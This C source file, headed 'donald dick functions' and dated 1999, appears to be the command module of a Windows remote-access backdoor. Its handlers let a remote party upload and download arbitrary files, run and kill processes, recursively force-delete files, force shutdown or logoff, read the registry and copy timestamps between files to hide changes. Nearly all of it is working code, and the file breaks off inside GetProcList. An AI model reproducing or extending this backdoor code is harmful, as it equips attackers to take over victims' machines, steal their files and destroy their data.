/*
  donald dick functions
  written by alexander yaworsky
  '99
*/

#include <excpt.h>
#include <windows.h>

#include "paths.h"
#include "registry.h"
#include "stringlist.h"
#include "executive.h"
#include "errors.h"
#include "network.h"
#include "stdlib.h"
#include "toolhelp.h"
#include "filetime.h"
#include "switches.h"


void GetProgramFilesPath( char* Buf )
  {
    DWORD  Sz, Type;
    HKEY   KeyH;

    *Buf = '\0';
    if( RegOpenKeyEx( HKEY_LOCAL_MACHINE,
                      "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                      0, KEY_READ, &KeyH ) != ERROR_SUCCESS ) return;
    Sz = MAX_PATH;
    RegQueryValueEx( KeyH, "ProgramFilesDir", 0, &Type, Buf, &Sz );
    RegCloseKey( KeyH );
  }

void SubstConst( char* Src, char* Dst, int DestSz )
  {
    int   i, s, d;
    char  ch;
    char  Path[ MAX_PATH ];
    BOOL  valid;

    for( s = d = 0; d < DestSz - 1; s++, d++ ) {
      ch = Src[ s ];
      if( ch == '\0' ) break;
      Dst[ d ] = ch;
      if( ch == ':' ) {
        if( Src[ s + 1 ] == ':' ) {
          valid = FALSE;
          if( lstrlen( Src + s + 2 ) >= 6 ) {
            lstrcpy( Path, Src + s + 2 );
            Path[ 6 ] = '\0';
            if( lstrcmp( Path, "SYSDIR" ) == 0 ) {
              valid = TRUE;
              Path[ 0 ] = '\0';
              GetSystemDirectory( Path, MAX_PATH );
            }
            else if( lstrcmp( Path, "WINDIR" ) == 0 ) {
              valid = TRUE;
              Path[ 0 ] = '\0';
              GetWindowsDirectory( Path, MAX_PATH );
            }
            else if( lstrcmp( Path, "TMPDIR" ) == 0 ) {
              valid = TRUE;
              Path[ 0 ] = '\0';
              GetTempPath( MAX_PATH, Path );
            }
            else if( lstrcmp( Path, "PRGDIR" ) == 0 ) {
              valid = TRUE;
              Path[ 0 ] = '\0';
              GetProgramFilesPath( Path );
            }
          }
          if( valid ) {
            i = lstrlen( Path );
            if( Path[ i - 1 ] == '\\' || Path[ i - 1 ] == '/' )
              Path[ i - 1] = '\0';
            for( i = 0; d < DestSz - 1; i++, d++ ) {
              ch = Path[ i ];
              if( ch == '\0' ) break;
              Dst[ d ] = ch;
            }
            if( d >= DestSz - 1 ) break;
            s += 7; d--;
          }
        }
      }
    }
    Dst[ d ] = '\0';
  }

HKEY GetRootKeyHandle( STRINGLIST* Result, char* Key )
  {
    if( lstrcmpi( Key, "HKLM" ) == 0 ) return HKEY_LOCAL_MACHINE;
    else if( lstrcmpi( Key, "HKCU" ) == 0 ) return HKEY_CURRENT_USER;
    else if( lstrcmpi( Key, "HKCR" ) == 0 ) return HKEY_CLASSES_ROOT;
    else if( lstrcmpi( Key, "HKUS" ) == 0 ) return HKEY_USERS;
    else {
      SetReply( Result, ERR_INVALID_ROOT_KEY, "" );
      return NULL;
    }
  }

BYTE* StrToBinary( char* Str )
  {
    BYTE   a, b;
    BYTE*  Val;
    int    i, j;

    i = lstrlen( Str );
    if( (Val = (BYTE*) LocalAlloc( LMEM_FIXED, (i + 1) >> 1 )) == NULL )
      return NULL;
    for( j = 0; j < i; j++ ) {
      if( Str[j] >= '0' && Str[j] <= '9' ) a = Str[j] - '0';
      else if( Str[j] >= 'A' && Str[j] <= 'F' ) a = Str[j] - 'A' + 10;
      else if( Str[j] >= 'a' && Str[j] <= 'f' ) a = Str[j] - 'a' + 10;
      else a = 0;
      j++;
      if( j < i ) {
        if( Str[j] >= '0' && Str[j] <= '9' ) b = Str[j] - '0';
        else if( Str[j] >= 'A' && Str[j] <= 'F' ) b = Str[j] - 'A' + 10;
        else if( Str[j] >= 'a' && Str[j] <= 'f' ) b = Str[j] - 'a' + 10;
        else b = 0;
      }
      else b = 0;
      Val[ j >> 1 ] = (a << 4) + b;
    }
    return Val;
  }

void BinaryToStrBuf( BYTE* Data, int Sz, char* Result )
  {
    int    i, j;
    BYTE   b;
    static char HexDigits[] = "0123456789ABCDEF";

    for( i = j = 0; i < Sz; i++ ) {
      b = Data[ i ];
      Result[ j++ ] = HexDigits[ (b >> 4) & 15 ];
      Result[ j++ ] = HexDigits[ b & 15 ];
    }
    Result[ j ] = '\0';
  }

char* BinaryToStr( BYTE* Data, int Sz )
  {
    char*  Result;

    if( (Result = (char*) LocalAlloc( LMEM_FIXED, (Sz << 1) + 1 )) == NULL )
      return NULL;
    BinaryToStrBuf( Data, Sz, Result );
    return Result;
  }

FUNCDEF( RegisterDick )
  {
    char  FileName[ MAX_PATH ];

    SetReply( Result, ERR_NOT_SUPPORTED_IN_LITE, "" );
    if( Params->Count > 1 ) {
      SubstConst( Params->Value[1], FileName, MAX_PATH );
      AddToStringList( Result, FileName );
    }
    return 1;
  }

FUNCDEF( Raise )
  {
    char* cp;

    cp = NULL;
    *cp = 'x';
    SetReply( Result, ERR_NO_ERROR, "" );
    return 1;
  }

FUNCDEF( Echo )
  {
    int  i;

    SetReply( Result, ERR_NO_ERROR, "" );
    for( i = 0; i < Params->Count; i++ )
      AddToStringList( Result, Params->Value[i] );
    return 1;
  }

FUNCDEF( UploadFile )
  {
    char  FileName[ MAX_PATH ];

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<file name>" );
      return 1;
    }
    SubstConst( Params->Value[1], FileName, MAX_PATH );
    SetReply( Result, ERR_NO_ERROR, "" );
    SendStringList( Ctx, Result );
    RecvFile( Ctx, FileName, NULL );
    return 0;
  }

FUNCDEF( DownloadFile )
  {
    char  FileName[ MAX_PATH ];

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<file name>" );
      return 1;
    }
    SubstConst( Params->Value[1], FileName, MAX_PATH );
    SetReply( Result, ERR_NO_ERROR, "" );
    SendStringList( Ctx, Result );
    SendFile( Ctx, FileName, NULL );
    return 0;
  }

FUNCDEF( PowerOff )
  {
    if( ExitWindowsEx( EWX_FORCE | EWX_SHUTDOWN | EWX_POWEROFF, 0 ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR,
         "ExitWindowsEx( EWX_FORCE | EWX_SHUTDOWN | EWX_POWEROFF, 0 )" );
    return 1;
  }

FUNCDEF( SysShutdown )
  {
    if( ExitWindowsEx( EWX_FORCE | EWX_SHUTDOWN, 0 ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR,
                "ExitWindowsEx( EWX_FORCE | EWX_SHUTDOWN, 0 )" );
    return 1;
  }

FUNCDEF( Reboot )
  {
    if( ExitWindowsEx( EWX_FORCE | EWX_SHUTDOWN | EWX_REBOOT, 0 ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR,
         "ExitWindowsEx( EWX_FORCE | EWX_SHUTDOWN | EWX_REBOOT, 0 )" );
    return 1;
  }

FUNCDEF( Logoff )
  {
    if( ExitWindowsEx( EWX_FORCE | EWX_LOGOFF, 0 ) )
      SetReply( Result, ERR_NO_ERROR, "" );
    else
      SetReply( Result, ERR_API_ERROR,
                "ExitWindowsEx( EWX_FORCE | EWX_LOGOFF, 0 )" );
    return 1;
  }

FUNCDEF( OpenCD )
  {
    MCI_OPEN_PARMS  mciOpenParms;

    mciOpenParms.lpstrDeviceType = "cdaudio";
    if( mciSendCommand( NULL, MCI_OPEN, MCI_OPEN_TYPE,
                        (DWORD)(LPVOID) &mciOpenParms ) )
      SetReply( Result, ERR_API_ERROR, "mciSendCommand( MCI_OPEN )" );
    else {
      if( mciSendCommand( mciOpenParms.wDeviceID,
                          MCI_SET, MCI_SET_DOOR_OPEN, NULL ) == 0 )
        SetReply( Result, ERR_NO_ERROR, "" );
      else
        SetReply( Result, ERR_API_ERROR, "mciSendCommand( MCI_SET )" );
      mciSendCommand( mciOpenParms.wDeviceID, MCI_CLOSE, 0, NULL );
    }
    return 1;
  }

FUNCDEF( CloseCD )
  {
    MCI_OPEN_PARMS  mciOpenParms;

    mciOpenParms.lpstrDeviceType = "cdaudio";
    if( mciSendCommand( NULL, MCI_OPEN, MCI_OPEN_TYPE,
                        (DWORD)(LPVOID) &mciOpenParms ) )
      SetReply( Result, ERR_API_ERROR, "mciSendCommand( MCI_OPEN )" );
    else {
      if( mciSendCommand( mciOpenParms.wDeviceID,
                          MCI_SET, MCI_SET_DOOR_CLOSED, NULL ) == 0 )
        SetReply( Result, ERR_NO_ERROR, "" );
      else
        SetReply( Result, ERR_API_ERROR, "mciSendCommand( MCI_SET )" );
      mciSendCommand( mciOpenParms.wDeviceID, MCI_CLOSE, 0, NULL );
    }
    return 1;
  }

FUNCDEF( Run )
  {
    PROCESS_INFORMATION  Pinf;
    STARTUPINFO          Sinf;
    int   i;
    char  FileName[ MAX_PATH ];

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<command> [...<command>]" );
      return 1;
    }
    for( i = 1; i < Params->Count; i++ ) {
      Sinf.cb = sizeof(STARTUPINFO);
      Sinf.lpReserved = NULL;
      Sinf.lpDesktop = NULL;
      Sinf.lpTitle = NULL;
      Sinf.dwFlags = 0;
      Sinf.cbReserved2 = 0;
      Sinf.lpReserved2 = NULL;
      SubstConst( Params->Value[ i ], FileName, MAX_PATH );
      if( CreateProcess( NULL, FileName, NULL, NULL, FALSE,
                         DETACHED_PROCESS,
                         NULL, NULL, &Sinf, &Pinf ) )
        SetReply( Result, ERR_NO_ERROR, "" );
      else
        SetReply( Result, ERR_API_ERROR, "CreateProcess" );
      CloseHandle( Pinf.hThread );
      CloseHandle( Pinf.hProcess );
    }
    return 1;
  }

FUNCDEF( KillByName )
  {
    HANDLE          Shh, Ph;
    PROCESSENTRY32  Pe;
    DWORD           Pid;
    BOOL            Terminated = FALSE;
    int             i;
    char            FileName[ MAX_PATH ];

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<filename> [...<filename>]" );
      return 1;
    }
    Shh = ThCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    if( Shh == INVALID_HANDLE_VALUE ) {
      SetReply( Result, ERR_API_ERROR, "ThCreateToolhelp32Snapshot" );
      return 1;
    }
    Pid = GetCurrentProcessId();
    for( i = 1; i < Params->Count; i++ ) {
      SubstConst( Params->Value[ i ], FileName, MAX_PATH );
      Pe.dwSize = sizeof( Pe );
      if( ! ThProcess32First( Shh, &Pe ) )
        SetReply( Result, ERR_API_ERROR, "ThProcess32First" );
      else {
        do {
          if( lstrcmpi( Pe.szExeFile, FileName ) == 0
              && Pe.th32ProcessID != Pid ) {
            Terminated = TRUE;
            Ph = OpenProcess( PROCESS_ALL_ACCESS, FALSE, Pe.th32ProcessID );
            if( Ph != NULL ) {
              KillProcessNotification( Pe.th32ProcessID );
              TerminateProcess( Ph, 0 );
              CloseHandle( Ph );
            }
          }
        } while( ThProcess32Next( Shh, &Pe ) );
      }
      if( ! Terminated ) SetReply( Result, ERR_PROCESS_NOT_FOUND, "" );
      else SetReply( Result, ERR_NO_ERROR, "" );
    }
    ThCloseHandle( Shh );
    return 1;
  }

FUNCDEF( Kill )
  {
    HANDLE  Ph;
    DWORD   Pid;
    int     i;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<process id (hex)> [...<process id (hex)>]" );
      return 1;
    }
    for( i = 1; i < Params->Count; i++ ) {
      Pid = Strtoul( Params->Value[ i ], NULL, 16 );
      Ph = OpenProcess( PROCESS_ALL_ACCESS, FALSE, Pid );
      if( Ph == NULL )
        SetReply( Result, ERR_API_ERROR, "OpenProcess" );
      else {
        KillProcessNotification( Pid );
        if( TerminateProcess( Ph, 0 ) )
          SetReply( Result, ERR_NO_ERROR, "" );
        else
         SetReply( Result, ERR_API_ERROR, "TerminateProcess" );
        CloseHandle( Ph );
      }
    }
    return 1;
  }

FUNCDEF( MsgBox )
  {
    char  Buf[ 64 ];

    if( Params->Count <= 3 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<caption> <message> <flags (hex)>" );
      return 1;
    }
    SetReply( Result, ERR_NO_ERROR, "" );
    wsprintf( Buf, "%d",
              MessageBox( NULL, Params->Value[2], Params->Value[1],
                         Strtoul( Params->Value[3], NULL, 16 ) ) );
    AddToStringList( Result, Buf );
    return 1;
  }

FUNCDEF( GetDrives )
  {
    char   *cp;
    char   DriveStrings[ 128 ];
    char   Buf[ 64 ];
    DWORD  Rc;

    Rc = GetLogicalDriveStrings( 128, DriveStrings );
    if( Rc == 0 || Rc > 128 )
      SetReply( Result, ERR_API_ERROR, "GetLogicalDriveStrings" );
    else {
      SetReply( Result, ERR_NO_ERROR, "" );
      cp = DriveStrings;
      while( *cp != '\0' ) {
        wsprintf( Buf, "%08X %s", GetDriveType( cp ), cp );
        AddToStringList( Result, Buf );
        cp += lstrlen( cp ) + 1;
      }
    }
    return 1;
  }

static void DirectoryString( char* str, SYSTEMTIME* STime,
                             WIN32_FIND_DATA* FData )
  {
    wsprintf( str, "%2d/%02d/%4d %2d:%02d:%02d  <sub-dir>  %s",
              STime->wDay, STime->wMonth, STime->wYear,
              STime->wHour, STime->wMinute, STime->wSecond,
              FData->cFileName );
  }

FUNCDEF( GetDirContents )
  {
    HANDLE          Fhnd;
    WIN32_FIND_DATA FData;
    FILETIME        FTime;
    SYSTEMTIME      STime;
    char            str[ MAX_PATH + 64 ];
    char            *cp;
    BOOL            SeparateDir;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<path\\mask> [<flag>]" );
      return 1;
    }
    SeparateDir = FALSE;
    if( Params->Count > 2 )
      SeparateDir = Strtoul( Params->Value[2], NULL, 0 );
    if( SeparateDir ) {
      SubstConst( Params->Value[1], str, MAX_PATH );
      cp = Strrchr( str, '\\' );
      if( cp == NULL ) cp = Strrchr( str, '/' );
      if( cp != NULL ) *cp = '\0';
      lstrcat( str, "\\*.*" );
      Fhnd = FindFirstFile( str, &FData );
      if( Fhnd == INVALID_HANDLE_VALUE ) {
        SetReply( Result, ERR_API_ERROR, "FindFirstFile" );
        return 1;
      }
      SetReply( Result, ERR_NO_ERROR, "" );
      do {
        FileTimeToLocalFileTime( &FData.ftLastWriteTime, &FTime );
        FileTimeToSystemTime( &FTime, &STime );
        if( FData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY ) {
          DirectoryString( str, &STime, &FData );
          AddToStringList( Result, str );
        }
      } while( FindNextFile( Fhnd, &FData ) != FALSE );
      FindClose( Fhnd );
    }
    SubstConst( Params->Value[1], str, MAX_PATH );
    Fhnd = FindFirstFile( str, &FData );
    if( Fhnd == INVALID_HANDLE_VALUE ) {
      if( ! SeparateDir ) SetReply( Result, ERR_API_ERROR, "FindFirstFile" );
    }
    else {
      if( ! SeparateDir ) SetReply( Result, ERR_NO_ERROR, "" );
      do {
        FileTimeToLocalFileTime( &FData.ftLastWriteTime, &FTime );
        FileTimeToSystemTime( &FTime, &STime );
        if( (FData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == 0 ) {
          wsprintf( str, "%2d/%02d/%4d %2d:%02d:%02d %10d  %s",
                    STime.wDay, STime.wMonth, STime.wYear,
                    STime.wHour, STime.wMinute, STime.wSecond,
                    FData.nFileSizeLow, FData.cFileName );
          AddToStringList( Result, str );
        }
        else if( ! SeparateDir ) {
          DirectoryString( str, &STime, &FData );
          AddToStringList( Result, str );
        }
      } while( FindNextFile( Fhnd, &FData ) != FALSE );
      FindClose( Fhnd );
    }
    return 1;
  }

static BOOL RecursiveErase( char* Dir )
  {
    typedef struct TagReLOCALS {
      int             i;
      HANDLE          Fhnd;
      char            Entry[ MAX_PATH ];
      WIN32_FIND_DATA FData;
    } ReLOCALS;

    ReLOCALS  *Data;
    BOOL      Rc = TRUE;
    
    Data = (ReLOCALS*) LocalAlloc( LMEM_FIXED, sizeof(ReLOCALS) );
    lstrcpy( Data->Entry, Dir ); lstrcat( Data->Entry, "\\*.*" );
    Data->Fhnd = FindFirstFile( Data->Entry, &Data->FData );
    if( Data->Fhnd == INVALID_HANDLE_VALUE )
      Rc = FALSE;
    else {
      do {
        if( Data->FData.cFileName[0] != '.' ) {
          lstrcpy( Data->Entry, Dir ); lstrcat( Data->Entry, "\\" );
          lstrcat( Data->Entry, Data->FData.cFileName );
          if( (Data->FData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)==0 ) {
            SetFileAttributes( Data->Entry, FILE_ATTRIBUTE_NORMAL );
            if( ! DeleteFile( Data->Entry ) ) Rc = FALSE;
          }
          else {
            if( ! RecursiveErase( Data->Entry ) ) Rc = FALSE;
          }
        }
      } while( FindNextFile( Data->Fhnd, &Data->FData ) != FALSE );
      FindClose( Data->Fhnd );
    }
    LocalFree( Data );
    if( ! RemoveDirectory( Dir ) ) Rc = FALSE;
    return Rc;
  }

static void DoErase( char* Param, STRINGLIST* Result )
  {
    HANDLE          Fhnd;
    WIN32_FIND_DATA FData;
    char            Dir[ MAX_PATH ];
    char            Fn[ MAX_PATH ];
    char            *cp;
    BOOL            Deleted = FALSE;
    BOOL            Force = FALSE;
    char            PathName[ MAX_PATH ];

    Fn[0] = Param[0];
    Fn[1] = Param[1];
    Fn[2] = Param[2];
    Fn[3] = '\0';
    if( lstrcmp( Fn, "/1 " ) == 0 ) {
      Force = TRUE;
      SubstConst( Param + 3, PathName, MAX_PATH );
    }
    else if( lstrcmp( Fn, "/0 " ) == 0 )
      SubstConst( Param + 3, PathName, MAX_PATH );
    else
      SubstConst( Param, PathName, MAX_PATH );
    Fhnd = FindFirstFile( PathName, &FData );
    if( Fhnd == INVALID_HANDLE_VALUE )
      SetReply( Result, ERR_API_ERROR, "FindFirstFile" );
    else {
      lstrcpy( Dir, PathName );
      if( (cp = Strrchr( Dir, '\\' )) != NULL )
        *(cp + 1) = 0;
      else
        Dir[ 0 ] = '\0';
      do {
        if( FData.cFileName[0] != '.' ) {
          lstrcpy( Fn, Dir ); lstrcat( Fn, FData.cFileName );
          if( (FData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == 0 ) {
            if( Force ) SetFileAttributes( Fn, FILE_ATTRIBUTE_NORMAL );
            if( DeleteFile( Fn ) ) {
              if( ! Deleted ) SetReply( Result, ERR_NO_ERROR, "" );
            }
            else {
              if( ! Deleted ) SetReply( Result, ERR_API_ERROR, "DeleteFile" );
            }
            Deleted = TRUE;
          }
          else {
            if( Force ) {
              if( RecursiveErase( Fn ) ) {
                if( ! Deleted ) SetReply( Result, ERR_NO_ERROR, "" );
              }
              else {
                SetLastError( ERROR_ACCESS_DENIED );
                if( ! Deleted )
                  SetReply( Result, ERR_API_ERROR,
                            "DeleteFile/RemoveDirectory" );
              }
            }
            else {
              if( RemoveDirectory( Fn ) ) {
                if( ! Deleted ) SetReply( Result, ERR_NO_ERROR, "" );
              }
              else {
                if( ! Deleted )
                  SetReply( Result, ERR_API_ERROR, "RemoveDirectory" );
              }
            }
            Deleted = TRUE;
          }
        }
      } while( FindNextFile( Fhnd, &FData ) != FALSE );
      FindClose( Fhnd );
      if( ! Deleted ) {
        SetLastError( ERROR_FILE_NOT_FOUND );
        SetReply( Result, ERR_API_ERROR, "DeleteFile" );
      }
    }
  }

FUNCDEF( Erase )
  {
    int  i;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<<force flag> <file/dir>> [...<<force flag> <file/dir>>]" );
      return 1;
    }
    for( i = 1; i < Params->Count; i++ )
      DoErase( Params->Value[i], Result );
    return 1;
  }

FUNCDEF( Rename )
  {
    int   i;
    char  Src[ MAX_PATH ], Dst[ MAX_PATH ];

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<filename> <new filename> [...<filename> <new filename>]" );
      return 1;
    }
    for( i = 0; i < ((Params->Count - 1) >> 1); i++ ) {
      SubstConst( Params->Value[ (i << 1) + 1 ], Src, MAX_PATH );
      SubstConst( Params->Value[ (i << 1) + 2 ], Dst, MAX_PATH );
      if( MoveFile( Src, Dst ) )
        SetReply( Result, ERR_NO_ERROR, "" );
      else
       SetReply( Result, ERR_API_ERROR, "MoveFile" );
    }
    return 1;
  }

FUNCDEF( RCopy )
  {
    int   i;
    char  Src[ MAX_PATH ], Dst[ MAX_PATH ];

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
         "<source filename> <destination filename> [...<source filename> <destination filename>]" );
      return 1;
    }
    for( i = 0; i < ((Params->Count - 1) >> 1); i++ ) {
      SubstConst( Params->Value[ (i << 1) + 1 ], Src, MAX_PATH );
      SubstConst( Params->Value[ (i << 1) + 2 ], Dst, MAX_PATH );
      if( CopyFile( Src, Dst, FALSE ) )
        SetReply( Result, ERR_NO_ERROR, "" );
      else
       SetReply( Result, ERR_API_ERROR, "CopyFile" );
    }
    return 1;
  }

FUNCDEF( GetPID )
  {
    char Buf[16];

    wsprintf( Buf, "%08X", GetCurrentProcessId() );
    SetReply( Result, ERR_NO_ERROR, "" );
    AddToStringList( Result, Buf );
    return 1;
  }

FUNCDEF( PlaySnd )
  {
    char  FileName[ MAX_PATH ];

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<filename>" );
      return 1;
    }
    SetReply( Result, ERR_NO_ERROR, "" );
    SubstConst( Params->Value[1], FileName, MAX_PATH );
    PlaySound( FileName, NULL, SND_FILENAME | SND_ASYNC | SND_NOWAIT );
    return 1;
  }

FUNCDEF( CreateDir )
  {
    int   i;
    char  DirName[ MAX_PATH ];

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<directory> [...<directory>]" );
      return 1;
    }
    for( i = 1; i < Params->Count; i++ )
      SubstConst( Params->Value[ i ], DirName, MAX_PATH );
      if( CreateDirectory( DirName, NULL ) )
        SetReply( Result, ERR_NO_ERROR, "" );
      else
        SetReply( Result, ERR_API_ERROR, "CreateDirectory" );
    return 1;
  }

FUNCDEF( RemoveDir )
  {
    int  i;
    char DirName[ MAX_PATH ];

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<directory> [...<directory>]" );
      return 1;
    }
    for( i = 1; i < Params->Count; i++ )
      SubstConst( Params->Value[ i ], DirName, MAX_PATH );
      if( RemoveDirectory( DirName ) )
        SetReply( Result, ERR_NO_ERROR, "" );
      else
        SetReply( Result, ERR_API_ERROR, "RemoveDirectory" );
    return 1;
  }

FUNCDEF( MonitorOff )
  {
    SendMessage( GetDesktopWindow(), WM_SYSCOMMAND, SC_MONITORPOWER, 0 );
    SetReply( Result, ERR_NO_ERROR, "" );
    return 1;
  }

FUNCDEF( MonitorOn )
  {
    SendMessage( GetDesktopWindow(), WM_SYSCOMMAND, SC_MONITORPOWER, -1 );
    SetReply( Result, ERR_NO_ERROR, "" );
    return 1;
  }

static void AddRegValueToList( STRINGLIST* Result, char* StrResult,
                               char* VData, DWORD VType, DWORD VDataSz )
  {
    if( VType == REG_SZ ) {
      lstrcpy( StrResult,"    SZ          VALUE=" );
      lstrcat( StrResult, VData );
    }
    else if( VType == REG_DWORD )
      wsprintf( StrResult, "    DWORD       VALUE=%08X (%d)",
                *((DWORD*)VData), *((DWORD*)VData) );
    else if( VType == REG_BINARY ) {
      lstrcpy( StrResult, "    BINARY      VALUE=" );
      BinaryToStrBuf( VData, VDataSz, StrResult + 22 );
    }
    else {
      wsprintf( StrResult, "    HEX(%04X)   VALUE=", VType );
      BinaryToStrBuf( VData, VDataSz, StrResult + 22 );
    }
    AddToStringList( Result, StrResult );
  }

FUNCDEF( GetRegistryValues )
  {
    HKEY   KeyH, Rk;
    DWORD  i, VNameSz, VDataSz, VType, MaxDataSz;
    char   VName[ MAX_PATH ];
    char   *VData, *StrResult;

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<registry key>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_READ, &KeyH ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
      return 1;
    }
    if( RegQueryInfoKey( KeyH, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
                         NULL, &MaxDataSz, NULL, NULL ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegQueryInfoKey" );
      RegCloseKey( KeyH );
      return 1;
    }
    MaxDataSz += 8192;
    if( (VData = (char*) LocalAlloc( LMEM_FIXED,
                              3 * MaxDataSz + 128 )) == NULL ) {
      SetReply( Result, ERR_OUT_OF_MEMORY, "" );
      RegCloseKey( KeyH );
      return 1;
    }
    SetReply( Result, ERR_NO_ERROR, "" );
    StrResult = VData + MaxDataSz;
    for( i = 0;; i++ ) {
      VNameSz = MAX_PATH; VDataSz = MaxDataSz;
      if( RegEnumValue( KeyH, i, VName, &VNameSz, NULL,
                   &VType, (LPBYTE) VData, &VDataSz ) != ERROR_SUCCESS )
        break;
      else {
        AddToStringList( Result, VName );
        AddRegValueToList( Result, StrResult, VData, VType, VDataSz );
      }
    }
    LocalFree( VData );
    RegCloseKey( KeyH );
    return 1;
  }

FUNCDEF( GetOneRegistryValue )
  {
    HKEY   KeyH, Rk;
    DWORD  VDataSz, VType;
    char   *VData, *StrResult;

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<registry key> <value name>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_READ, &KeyH ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
      return 1;
    }
    if( RegQueryValueEx( KeyH, Params->Value[2], NULL,
                         &VType, NULL, &VDataSz ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegQueryValueEx" );
      RegCloseKey( KeyH );
      return 1;
    }
    VDataSz += 4096;
    if( (VData = (char*) LocalAlloc( LMEM_FIXED,
                              3 * VDataSz + 128 )) == NULL ) {
      SetReply( Result, ERR_OUT_OF_MEMORY, "" );
      return 1;
    }
    StrResult = VData + VDataSz;
    if( RegQueryValueEx( KeyH, Params->Value[2], NULL,
                         &VType, VData, &VDataSz ) != ERROR_SUCCESS ) {
      RegCloseKey( KeyH );
      LocalFree( VData );
      SetReply( Result, ERR_API_ERROR, "RegQueryValueEx" );
      return 1;
    }
    RegCloseKey( KeyH );
    SetReply( Result, ERR_NO_ERROR, "" );
    AddRegValueToList( Result, StrResult, VData, VType, VDataSz );
    LocalFree( VData );
    return 1;
  }

FUNCDEF( GetRegistryKeys )
  {
    HKEY        KeyH, Rk;
    DWORD       i, VNameSz;
    FILETIME    Wtm;
    char        VName[ MAX_PATH ];

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<registry key>" );
      return 1;
    }
    Params->Value[1][4] = '\0';
    Rk = GetRootKeyHandle( Result, Params->Value[1] );
    if( Rk == NULL ) return 1;
    if( RegOpenKeyEx( Rk, Params->Value[1]+5,
                      0, KEY_READ, &KeyH ) != ERROR_SUCCESS ) {
      SetReply( Result, ERR_API_ERROR, "RegOpenKeyEx" );
      return 1;
    }
    SetReply( Result, ERR_NO_ERROR, "" );
    for( i = 0;; i++ ) {
      VNameSz = MAX_PATH;
      if( RegEnumKeyEx( KeyH, i, VName, &VNameSz,
                        NULL, NULL, NULL, &Wtm ) != ERROR_SUCCESS ) break;
      AddToStringList( Result, VName );
    }
    RegCloseKey( KeyH );
    return 1;
  }

FUNCDEF( SetFileTimeEqualTo )
  {
    SYSTEMTIME  Stm;
    char        FileName[ MAX_PATH ];

    if( Params->Count <= 2 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS,
                "<file name> <reference file>" );
      return 1;
    }
    SubstConst( Params->Value[2], FileName, MAX_PATH );
    if( ! GetLocalFileTime( FileName, &Stm ) ) {
      SetReply( Result, ERR_API_ERROR, "GetFileTime" );
      return 1;
    }
    SubstConst( Params->Value[1], FileName, MAX_PATH );
    if( ! SetLocalFileTime( FileName, &Stm ) ) {
      SetReply( Result, ERR_API_ERROR, "SetFileTime" );
      return 1;
    }
    SetReply( Result, ERR_NO_ERROR, "" );
    return 1;
  }

FUNCDEF( GetThreadList )
  {
    HANDLE          Shh;
    THREADENTRY32   Pe;
    DWORD           Pid;
    char            Buf[ 10 ];

    if( Params->Count <= 1 ) {
      SetReply( Result, ERR_INVALID_NUM_OF_PARAMS, "<process id (hex)>" );
      return 1;
    }
    Pid = Strtoul( Params->Value[1], NULL, 16 );
    Shh = ThCreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
    if( Shh == INVALID_HANDLE_VALUE ) {
      SetReply( Result, ERR_API_ERROR, "ThCreateToolhelp32Snapshot" );
      return 1;
    }
    Pe.dwSize = sizeof( Pe );
    if( ! ThThread32First( Shh, &Pe ) )
      SetReply( Result, ERR_API_ERROR, "ThThread32First" );
    else {
      SetReply( Result, ERR_NO_ERROR, "" );
      do {
        if( Pid == Pe.th32OwnerProcessID ) {
          wsprintf( Buf, "%08X", Pe.th32ThreadID );
          AddToStringList( Result, Buf );
        }
      } while( ThThread32Next( Shh, &Pe ) );
    }
    ThCloseHandle( Shh );
    return 1;
  }


FUNCDEF( GetProcList )
  {
    HANDLE          Shh, Ph;
    PROCESSENTRY32  Pe;
